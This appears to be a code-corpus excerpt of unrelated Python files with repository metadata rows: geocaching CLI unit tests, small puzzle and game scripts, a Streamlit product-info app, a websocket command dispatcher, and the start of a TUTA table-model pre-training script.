with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), "continue")
class TestShowOne(unittest.TestCase):
def test_1_no_waypoints(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.show_one(False), "delete")
def test_2_no_waypoints(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.show_one(False), "gc.com")
def test_3_no_waypoints(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.show_one(False), "dist")
def test_4_no_waypoints(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.show_one(False), "gc-map")
def test_5_no_waypoints(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.show_one(False), "googlemaps")
def test_6_no_waypoints(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.show_one(False), None)
def test_other_no_waypoints(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.show_one(False), None)
def test_output_no_waypoints(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.show_one(False)
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: diesen Cache loeschen\n"
expected += "2: diesen Cache auf geocaching.com oeffnen (INTERNET!!!)\n"
expected += "3: Abstand dieses Caches zu einer bestimmten Position berechnen\n"
expected += "4: Position des Caches auf der Karte "
expected += "https://www.geocaching.com/map anzeigen (INTERNET!!!)\n"
expected += "5: Position des Caches auf der Karte https://www.google.de/maps anzeigen (INTERNET!!!)\n"
expected += "6: zurueck\n"
self.assertEqual(output, expected)
def test_1_waypoints(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.show_one(True), "delete")
def test_2_waypoints(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.show_one(True), "gc.com")
def test_3_waypoints(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.show_one(True), "dist")
def test_4_waypoints(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.show_one(True), "gc-map")
def test_5_waypoints(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.show_one(True), "googlemaps")
def test_6_waypoints(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.show_one(True), "mapcustomizer")
def test_7_waypoints(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.show_one(True), None)
def test_other_waypoints(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.show_one(True), None)
def test_output_waypoints(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.show_one(True)
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: diesen Cache loeschen\n"
expected += "2: diesen Cache auf geocaching.com oeffnen (INTERNET!!!)\n"
expected += "3: Abstand dieses Caches zu einer bestimmten Position berechnen\n"
expected += "4: Position des Caches auf der Karte "
expected += "https://www.geocaching.com/map anzeigen (INTERNET!!!)\n"
expected += "5: Position des Caches auf der Karte https://www.google.de/maps anzeigen (INTERNET!!!)\n"
expected += "6: diesen Cache mit allen Wegpunkten auf Karte zeigen (INTERNET!!!)\n"
expected += "7: zurueck\n"
self.assertEqual(output, expected)
class TestCoordinatesInput(unittest.TestCase):
def test_return(self):
with mock.patch('builtins.input', return_value="X XX\xb0XX.XXX, X XXX\xb0XX.XXX"):
self.assertEqual(user_io.coordinates_input(), "X XX°XX.XXX, X XXX°XX.XXX")
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.coordinates_input()
output = out.getvalue()
expected = "Gib die Koordinaten ein "
expected += "(Format: X XX°XX.XXX, X XXX°XX.XXX oder URL (google maps oder geocaching.com/map))\n"
self.assertEqual(output, expected)
class TestAskForPath(unittest.TestCase):
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.ask_for_path()
output = out.getvalue()
expected = "\nGib den Pfad zum GPS-Geraet ein (NICHT zum Unterordner 'GPX').\n"
expected += "Falls Standardpfad uebernommen werden soll: keine Eingabe\n"
self.assertEqual(output, expected)
def test_return(self):
with mock.patch('builtins.input', return_value="any_path"):
self.assertEqual(user_io.ask_for_path(), "any_path")
def test_default_return(self):
with mock.patch('builtins.input', return_value=""):
self.assertEqual(user_io.ask_for_path(), "default")
class TestAskForWaypoints(unittest.TestCase):
def test_yes(self):
with mock.patch('builtins.input', return_value="y"):
self.assertEqual(user_io.ask_for_waypoints(), True)
def test_no(self):
with mock.patch('builtins.input', return_value="n"):
self.assertEqual(user_io.ask_for_waypoints(), False)
def test_nonsense(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
self.assertEqual(user_io.ask_for_waypoints(), False)
class TestShowOnMapStart(unittest.TestCase):
def test_output_no_waypoints(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(False, False)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, " \
"kopiere den vollstaendigen Inhalt der Textdatei "
expected += "aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Die Caches werden in folgenden Farben angezeigt:\n"
expected += "Gruen: Traditional Cache\n"
expected += "Rot: Multi-cache\n"
expected += "Blau: Mystery Cache\n"
expected += "Braun: EarthCache\n"
expected += "Grau: Letterbox, Geocaching HQ\n"
expected += "Gelb: Event Cache, Wherigo Cache\n"
expected += "Pink: unbekannter Typ\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_output_all_waypoints(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(False, True)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, kopiere den vollstaendigen Inhalt "
expected += "der Textdatei aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Die Caches werden in folgenden Farben angezeigt:\n"
expected += "Gruen: Traditional Cache\n"
expected += "Rot: Multi-cache\n"
expected += "Blau: Mystery Cache\n"
expected += "Braun: EarthCache\n"
expected += "Grau: Letterbox, Geocaching HQ\n"
expected += "Gelb: Event Cache, Wherigo Cache, Wegpunkte\n"
expected += "Pink: unbekannter Typ\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_output_one_waypoints(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(True, True)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, kopiere den vollstaendigen Inhalt "
expected += "der Textdatei aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_output_one_no_waypoints(self): # makes no difference because it is nonsense
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(True, False)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, kopiere den vollstaendigen Inhalt "
expected += "der Textdatei aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_return(self):
with mock.patch('builtins.input', return_value="any_editor"):
self.assertEqual(user_io.show_on_map_start(False, True), "any_editor")
def test_default_return(self):
with mock.patch('builtins.input', return_value=""):
self.assertEqual(user_io.show_on_map_start(True, False), "notepad.exe")
class TestShowOnMapEnd(unittest.TestCase):
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_end()
output = out.getvalue()
expected = "Schliesse den Editor und druecke Enter.\n"
self.assertEqual(output, expected)
def create_testsuite():
"""creates a testsuite with out of all tests in this file"""
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestGeneralOutput))
suite.addTest(unittest.makeSuite(TestGeneralInput))
suite.addTest(unittest.makeSuite(TestShowMainMenu))
suite.addTest(unittest.makeSuite(TestMainMenu))
suite.addTest(unittest.makeSuite(TestMapMenu))
suite.addTest(unittest.makeSuite(TestSortCaches))
suite.addTest(unittest.makeSuite(TestSearch))
suite.addTest(unittest.makeSuite(TestSearchType))
suite.addTest(unittest.makeSuite(TestSearchAttribute))
suite.addTest(unittest.makeSuite(TestActionsAfterSearch))
suite.addTest(unittest.makeSuite(TestActionsWithFounds))
suite.addTest(unittest.makeSuite(TestConfirmDeletion))
suite.addTest(unittest.makeSuite(TestWaypointMenu))
suite.addTest(unittest.makeSuite(TestChooseCache))
suite.addTest(unittest.makeSuite(TestShowOne))
suite.addTest(unittest.makeSuite(TestCoordinatesInput))
suite.addTest(unittest.makeSuite(TestAskForPath))
suite.addTest(unittest.makeSuite(TestAskForWaypoints))
suite.addTest(unittest.makeSuite(TestShowOnMapStart))
suite.addTest(unittest.makeSuite(TestShowOnMapEnd))
return suite
def main(v):
"""runs the testsuite"""
return test_frame.run(v, create_testsuite, "user_io.py")
if __name__ == '__main__':
if len(sys.argv) > 1: # if script is run with argument
verbosity = int(sys.argv[1])
else: # if no argument -> verbosity 1
verbosity = 1
main(verbosity)
| 44.936567 | 118 | 0.630096 |
bab3bada988756769c8b3327590eb6ad143eac63
| 35 |
py
|
Python
|
DjangoStarter/DjangoStarter/__init__.py
|
QuinntyneBrown/DjangoStarter
|
7c2f385546568604acbb4f18d8a473ecb3688202
|
[
"MIT"
] | null | null | null |
DjangoStarter/DjangoStarter/__init__.py
|
QuinntyneBrown/DjangoStarter
|
7c2f385546568604acbb4f18d8a473ecb3688202
|
[
"MIT"
] | null | null | null |
DjangoStarter/DjangoStarter/__init__.py
|
QuinntyneBrown/DjangoStarter
|
7c2f385546568604acbb4f18d8a473ecb3688202
|
[
"MIT"
] | null | null | null |
"""
Package for DjangoStarter.
"""
| 8.75 | 26 | 0.657143 |
240a7bd5f59637ee67ddbee7e1ddd123e959d491
| 391 |
py
|
Python
|
old/simple.py
|
friemoeh/stau
|
0a624759a9c65eda2be4cf62d0ece9a5ad7366bb
|
[
"Apache-2.0"
] | null | null | null |
old/simple.py
|
friemoeh/stau
|
0a624759a9c65eda2be4cf62d0ece9a5ad7366bb
|
[
"Apache-2.0"
] | null | null | null |
old/simple.py
|
friemoeh/stau
|
0a624759a9c65eda2be4cf62d0ece9a5ad7366bb
|
[
"Apache-2.0"
] | null | null | null |
from random import randrange
from Car import Car
car1 = Car("Porsche Cayman S",15, 250)
car1.drive(100)
for t in range(10):
print (t)
print(car1)
a=randrange(1,4)
if a == 1:
car1.brake(5)
print("breaking")
elif a == 2:
car1.acc(5)
print("acceleratione")
else:
car1.acc(0)
print("keep")
car1.goForward(t)
| 13.482759 | 38 | 0.544757 |
236804b13f6d0d6706e9d3a16451ccbf261c0e22
| 1,617 |
py
|
Python
|
comunication.py
|
Az107/Quark
|
10c0c953143fb9fc3351dbad9418880aeb5d5a56
|
[
"MIT"
] | 1 |
2020-11-22T22:22:59.000Z
|
2020-11-22T22:22:59.000Z
|
comunication.py
|
Az107/Quark
|
10c0c953143fb9fc3351dbad9418880aeb5d5a56
|
[
"MIT"
] | null | null | null |
comunication.py
|
Az107/Quark
|
10c0c953143fb9fc3351dbad9418880aeb5d5a56
|
[
"MIT"
] | 1 |
2020-11-22T22:24:19.000Z
|
2020-11-22T22:24:19.000Z
|
import asyncio
import websockets
import DisplayActions
import ctypes
import os
authenticated = True
dActions = DisplayActions.Actions()
reserved = ["load","fun"]
global websocket_pointer
async def commu(websocket, path):
async for message in websocket:
dActions.websocket_pointer = id(websocket)
try:
_class,_method = message.split(".")
if (_class == "change" and authenticated):
variable,value = _method.split(":",1)
item = getattr(dActions,variable)
setattr(item,"websocket_pointer",id(websocket))
item.value(value,False)
setattr(item,"name",variable)
setattr(dActions,variable,item)
elif (_class == "click" and _method not in reserved and authenticated):
method = None
method = getattr(dActions,_method)
method()
elif (_class == "load" and authenticated):
method = getattr(dActions,"load")
method()
elif (_class == "auth"):
if _method == str(os.getpid()): authenticated = True
except NameError as E:
            print(message + " does not exist")
except Exception as E:
print (message)
if (hasattr(E,"message")):
                print("error: " + E.message)
else:
print(E)
def start():
port = int("8" + str(os.getpid())[1:])
ws = websockets.serve(commu, 'localhost', port)
loop = asyncio.get_event_loop()
loop.run_until_complete(ws)
loop.run_forever()
| 32.34 | 83 | 0.563389 |
23825cd9dfc310f9b5d988ee80f0a6b7747833c4
| 776 |
py
|
Python
|
ProjectEuler_plus/euler_025.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_025.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_025.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from math import ceil, log10
from itertools import count
def fib_number_of_digits(n):
'''
http://www.geeksforgeeks.org/finding-number-of-digits-in-nth-fibonacci-number/
'''
PHI = 1.6180339887498948
if n == 1:
return 1
d = (n * log10(PHI)) - (log10(5) / 2)
return ceil(d)
res = [0] * 5001
temp = 0
for i in range(5001):
for j in count(temp, 1):
if fib_number_of_digits(j) > i - 1:
res[i] = j
temp = j
break
for _ in range(int(input().strip())):
N = int(input().strip())
print(res[N])
#
#
#for _ in range(int(input().strip())):
# N = int(input().strip())
# for i in count(1):
# if fib_number_of_digits(i) > N - 1:
# break
# print(i)
#
| 21.555556 | 82 | 0.550258 |
cc76ab83ee81f7e53e657e377715df89a15908d9
| 1,101 |
py
|
Python
|
app/appdev.py
|
student1304/co2
|
dc83bb19d1f75ac7b04273e8d9c3f14a3a44153c
|
[
"Apache-2.0"
] | null | null | null |
app/appdev.py
|
student1304/co2
|
dc83bb19d1f75ac7b04273e8d9c3f14a3a44153c
|
[
"Apache-2.0"
] | null | null | null |
app/appdev.py
|
student1304/co2
|
dc83bb19d1f75ac7b04273e8d9c3f14a3a44153c
|
[
"Apache-2.0"
] | null | null | null |
import streamlit as st
import pandas as pd
#import numpy as np
#import time
from api_tools import get_product_info
# load md text from file and display on page
path_to_md = "./intro.md"
with open(path_to_md, "r") as f:
md_text = f.read()
st.markdown(md_text)
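# The uploaded cart CSV is expected to contain a GTIN column (only data.GTIN
# is read below); an illustrative layout, values made up:
#   GTIN,Quantity
#   4000417025005,2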
# load and display cart
cart_csv = st.file_uploader('Drag&Drop CSV oder Upload hier', type="csv")
if cart_csv is not None:
data = pd.read_csv(cart_csv, sep=',', decimal='.')
st.write(data)
st.balloons()
#loop through cart and show categories
for gtin in data.GTIN:
#st.write(gtin)
info = get_product_info(gtin)
st.info('getting info for... '+str(gtin))
if info['status'] != 1:
st.markdown(' - **no info** available in openfoodfacts.org')
else:
image_url = info['product']['selected_images']['front']['thumb']['de']
            # show the product thumbnail (the original format string was empty
            # and would raise at runtime; an inline markdown image is assumed)
            st.markdown('![product](%s)' % image_url)
st.write(
info['product']['packaging_tags'],
info['product']['categories_hierarchy']
)
st.success('it worked!')
| 29.756757 | 82 | 0.603996 |
cc87991e668d4c05c3bd94d6016210d3ddbd3ed6
| 1,139 |
py
|
Python
|
0021merge-two-sorted-lists.py
|
meat00/my-leetcode-python
|
8312de396b29e1d6dd54a65f87fa0511eb400faa
|
[
"MIT"
] | null | null | null |
0021merge-two-sorted-lists.py
|
meat00/my-leetcode-python
|
8312de396b29e1d6dd54a65f87fa0511eb400faa
|
[
"MIT"
] | null | null | null |
0021merge-two-sorted-lists.py
|
meat00/my-leetcode-python
|
8312de396b29e1d6dd54a65f87fa0511eb400faa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __str__(self):
text = str()
node = self
        while node is not None:
            text += "%d->" % node.val
            node = node.next
text += "None"
return text
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
head = ListNode(0)
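        # dummy head: the merge loop can always append to l3.next without
        # special-casing an empty result; head.next is the real merged list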
l3 = head
while l1 and l2:
if l1.val < l2.val:
l3.next = l1
l1 = l1.next
else:
l3.next = l2
l2 = l2.next
l3 = l3.next
if l1:
l3.next = l1
if l2:
l3.next = l2
return head.next
if __name__ == "__main__":
s = Solution()
a1 = ListNode(1)
a2 = ListNode(2)
a4 = ListNode(4)
b1 = ListNode(1)
b3 = ListNode(3)
b4 = ListNode(4)
a1.next = a2
a2.next = a4
b1.next = b3
b3.next = b4
print(a1)
print(b1)
ret = s.mergeTwoLists(a1, b1)
print('merge:', end='')
print(ret)
| 20.709091 | 68 | 0.461809 |
cc8c3bb1597e5b3ca5cdf3e9d3c20f30873bf602
| 3,638 |
py
|
Python
|
skimind/kernel/useCases/buildTicket/dataFilter.py
|
NathBangwa/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 1 |
2020-11-13T18:30:47.000Z
|
2020-11-13T18:30:47.000Z
|
skimind/kernel/useCases/buildTicket/dataFilter.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 5 |
2020-11-13T18:16:48.000Z
|
2021-09-08T01:04:59.000Z
|
skimind/kernel/useCases/buildTicket/dataFilter.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | null | null | null |
#-*-coding: utf-8 -*-
# interfacedb
from . import interfacedb
# gFunctions
from . import gFunctions
# tools
import pandas as pd
import numpy as np
# config
from . import config
def get_ticket_columns():
columns = [
*interfacedb.modelTables.matchs.get_primary_key(),
interfacedb.modelTables.matchs.time,
interfacedb.modelTables.matchs.home,
interfacedb.modelTables.matchs.visitor,
]
return columns
def get_datas(task_list:list, margin_time:int):
"""
"""
datas_df = interfacedb.modelRequest.get_prediction_datas()
    # prediction columns of the selected tasks
predictions_columns = map(interfacedb.modelTables.prediction.get_predict_task_col, task_list)
predictions_columns = list(predictions_columns)
def transforme_class_to_betid():
"""
        transform the classes into bet ids
"""
nonlocal datas_df
nonlocal predictions_columns
for index_task, pred_cols in enumerate(predictions_columns):
# task name
task_name = task_list[index_task]
datas_df[pred_cols] = [interfacedb.modelTables.matchs.get_betid_from(task_name, class_id)
for class_id in datas_df[pred_cols]]
def filter_best_prediction():
"""
"""
nonlocal datas_df
nonlocal predictions_columns
def get_probabilities_cols():
columns = []
for task_name in task_list:
columns += interfacedb.modelTables.prediction.get_task_probabilities_cols(task_name)
return columns
probabilities_columns = get_probabilities_cols()
target_datas = {
config.COTE_COL: [],
config.PROBABILITY_COL: [],
config.PREDICTION_COL: []
}
for index in datas_df.index:
            # the probabilities of all tasks for this row
probabilities = datas_df.loc[index, probabilities_columns]
probabilities = list(probabilities.values)
            # best probability across tasks
best_probability = max(probabilities)
# task probabilities column
index_prob = probabilities.index(best_probability)
task_prob_name = probabilities_columns[index_prob]
# task name
task_names = filter(lambda task: task.lower() in task_prob_name, task_list)
task_names = list(task_names)
best_task_name = task_names[0]
# best prediction
best_pred_cols = interfacedb.modelTables.prediction.get_predict_task_col(best_task_name)
best_prediction = datas_df.loc[index, best_pred_cols]
# best cote
cote_cols = interfacedb.modelTables.matchs.format_cote(best_prediction)
best_cote = datas_df.loc[index, cote_cols]
# add datas
target_datas[config.COTE_COL].append(best_cote)
target_datas[config.PROBABILITY_COL].append(best_probability)
target_datas[config.PREDICTION_COL].append(best_prediction)
# ticket columns
ticket_columns = get_ticket_columns()
    # keep only the relevant columns
datas_df = datas_df[ticket_columns]
# add cote prediction probability columns
datas_df[config.COTE_COL] = target_datas[config.COTE_COL]
datas_df[config.PREDICTION_COL] = target_datas[config.PREDICTION_COL]
datas_df[config.PROBABILITY_COL] = target_datas[config.PROBABILITY_COL]
transforme_class_to_betid()
filter_best_prediction()
return datas_df
| 28.645669 | 102 | 0.64541 |
4e07aae04b48816df9b9ec4ed208675854d38c5b
| 528 |
py
|
Python
|
PMIa/2015/KOLOV_A_A/task_6_14.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/KOLOV_A_A/task_6_14.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/KOLOV_A_A/task_6_14.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task 6. Variant 14.
# Create a game in which the computer picks the name of one of the three official
# mascots of the 2014 Winter Olympics in Sochi, and the player has to guess it.
# Kolov A.A
# 25.05.2016
import random
mascots = ['Леопард','Белый Мишка','Зайка']
progSel = mascots[random.randint(0,2)]
userSel = input("Компьютер загадал одного из талисманов Олимпиады в Сочи. Сможете ли вы его удадать? ")
if userSel==progSel:
print("Верно! Это действительно " + userSel)
else:
print("Неверно! Это не " + userSel)
input()
| 35.2 | 157 | 0.744318 |
4e3e8457ecaa37412f76888b6250fd5d05ed950d
| 475 |
py
|
Python
|
559-maximum-depth-of-n-ary-tree/559-maximum-depth-of-n-ary-tree.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | 2 |
2021-12-05T14:29:06.000Z
|
2022-01-01T05:46:13.000Z
|
559-maximum-depth-of-n-ary-tree/559-maximum-depth-of-n-ary-tree.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
559-maximum-depth-of-n-ary-tree/559-maximum-depth-of-n-ary-tree.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
"""
# Definition for a Node.
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
"""
class Solution:
def maxDepth(self, root: 'Node') -> int:
if not root:
return 0
stack=[(root, 1)]
while(stack):
cur, level = stack.pop(0)
if cur.children:
for c in cur.children:
stack.append((c, level+1))
return level
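if __name__ == "__main__":
    # Minimal illustrative check; this Node mirrors the commented stub above.
    class Node:
        def __init__(self, val=None, children=None):
            self.val = val
            self.children = children
    root = Node(1, [Node(2, []), Node(3, [])])
    print(Solution().maxDepth(root))  # expected: 2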
| 25 | 48 | 0.509474 |
9d8e4cc86959dac85085503a187249ee7cb7a265
| 1,467 |
py
|
Python
|
INBa/2015/Mitin_D_S/task_9_15.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Mitin_D_S/task_9_15.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Mitin_D_S/task_9_15.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Create a game in which the computer picks a word and the player has to guess it.
# The computer tells the player how many letters the word has and gives five
# attempts to find out whether a given letter occurs in the word; the program
# may only answer "Yes" or "No".
# After that the player has to try to guess the word.
# Mitin D.S.
# 10.05.2016, 22:18
import random
slova=("здоровье","май","программирование","питон","лето","сессия","пять")
zagadka=random.choice(slova)
proverka=zagadka
chislo=len(zagadka)
bykva = random.randrange(chislo)
i=4
k=0
print("Здравствуй, студент! Ты должен спасти мир, отгадав загаданное словов!")
print("Ты называешь буквы, а я говорю тебе, есть ли она в слове, или нет! И у тебя есть только пять попыток! ПЯТЬ!")
dymai=input("Ты готов сыграть в игру? ")
if dymai == "Нет" or dymai == "нет":
exit(0)
else: print ("Тогда поехали!")
print("Я загадал слово и в нем",chislo,"букв!")
poisk=input("Вводи букву: ")
while i>0:
if poisk in proverka:
print("Есть такая буква!")
else: print("Нет такой буквы")
i-=1
poisk=input("Вводи еще одну букву: ")
print("Все! У тебя кончились попытки! Теперь отгадай слово! Давай я тебе помогу! В нем всего лишь",chislo,'букв!')
while poisk != zagadka:
poisk=input("Итак, по-твоему, это слово: ")
if poisk !=zagadka: print("Не угадал! Давай еще попробуй! ну а вдруг угадаешь :)")
print("Да! ДА! ТЫ УГАДАЛ! Это",zagadka,"!!! Теперь я могу тебя выпустить!")
input("Нажми ENTER, чтобы я тебя освободил!")
| 40.75 | 116 | 0.722563 |
9dde70e629b8e7cb82755d4576cc05f224e55128
| 11,275 |
py
|
Python
|
tuta/train.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 36 |
2021-06-15T01:04:27.000Z
|
2022-03-19T16:36:54.000Z
|
tuta/train.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 6 |
2021-09-03T11:29:36.000Z
|
2021-12-15T11:33:57.000Z
|
tuta/train.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 8 |
2021-11-03T04:32:36.000Z
|
2022-02-02T13:43:47.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Do Pre-Training of TUTA Model (variants)
"""
import torch
import argparse
import torch.distributed as dist
import torch.multiprocessing as mp
import tokenizer as tknr
import model.pretrains as ptm
import trainers as tnr
import dynamic_data as dymdata
from utils import init_tuta_loose, init_with_bert_weight
from optimizer import AdamW, WarmupLinearSchedule
from torch.nn.parallel import DistributedDataParallel
def worker(proc_id, gpu_ranks, args, model):
if args.dist_train: # multiple GPU mode
rank = gpu_ranks[proc_id] % args.world_size
gpu_id = gpu_ranks[proc_id] % args.device_count
elif args.single_gpu: # single GPU mode
rank = None
gpu_id = proc_id
else: # CPU mode
rank = None
gpu_id = None
if args.dist_train:
train_loader = dymdata.DataLoaders[args.target](args, rank, args.world_size, True)
else:
train_loader = dymdata.DataLoaders[args.target](args, 0, 1, True)
if gpu_id is not None:
torch.cuda.set_device(gpu_id)
model.cuda(gpu_id)
# build optimizer
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'gamma', 'beta']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if (not any(nd in n for nd in no_decay)) ], 'weight_decay_rate': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay) ], 'weight_decay_rate': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, correct_bias=False)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.total_steps*args.warmup, t_total=args.total_steps)
if args.dist_train:
# initialize multiprocessing distributed training environment
dist.init_process_group(
backend=args.backend,
init_method=args.master_ip,
world_size=args.world_size,
rank=rank
)
model = DistributedDataParallel(model, device_ids=[gpu_id], find_unused_parameters=True) # find_unused_parameters=True
print("Worker {} is training ... ".format(rank))
else:
print("Worker is training ...")
tnr.TRAINERS[args.target](args, gpu_id, rank, train_loader, model, optimizer, scheduler)
def train_and_validate(args):
args.tokenizer = tknr.TutaTokenizer(args)
args.vocab_size = len(args.tokenizer.vocab)
model = ptm.MODELS[args.target](args)
if args.load_type == "bert":
model = init_with_bert_weight(args, model)
elif args.load_type == "tuta":
init_tuta_loose(model=model, tuta_path=args.pretrained_model_path)
else:
init_tuta_loose(model=model, tuta_path=None)
if args.dist_train: # multiple GPU mode
mp.spawn(worker, nprocs=args.ranks_num, args=(args.gpu_ranks, args, model), daemon=False)
elif args.single_gpu: # single GPU mode
worker(args.gpu_id, None, args, model)
else: # CPU mode
worker(None, None, args, model)
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# vocabulary options
parser.add_argument("--vocab_path", type=str, default="./vocab/bert_vocab.txt", help="Path of the vocabulary file.")
parser.add_argument("--context_repo_path", type=str, default="./vocab/context_repo_init.txt", help="TXT of pre-collected context pieces.")
    parser.add_argument("--cellstr_repo_path", type=str, default="./vocab/cellstr_repo_init.txt", help="TXT of pre-collected cell strings.")
# model configuration options
parser.add_argument("--hidden_size", type=int, default=768, help="Size of the hidden states.")
parser.add_argument("--intermediate_size", type=int, default=3072, help="Size of the intermediate layer.")
parser.add_argument("--magnitude_size", type=int, default=10, help="Max magnitude of numeric values.")
parser.add_argument("--precision_size", type=int, default=10, help="Max precision of numeric values.")
parser.add_argument("--top_digit_size", type=int, default=10, help="Most significant digit from '0' to '9'.")
parser.add_argument("--low_digit_size", type=int, default=10, help="Least significant digit from '0' to '9'.")
parser.add_argument("--row_size", type=int, default=256, help="Max number of rows in table.")
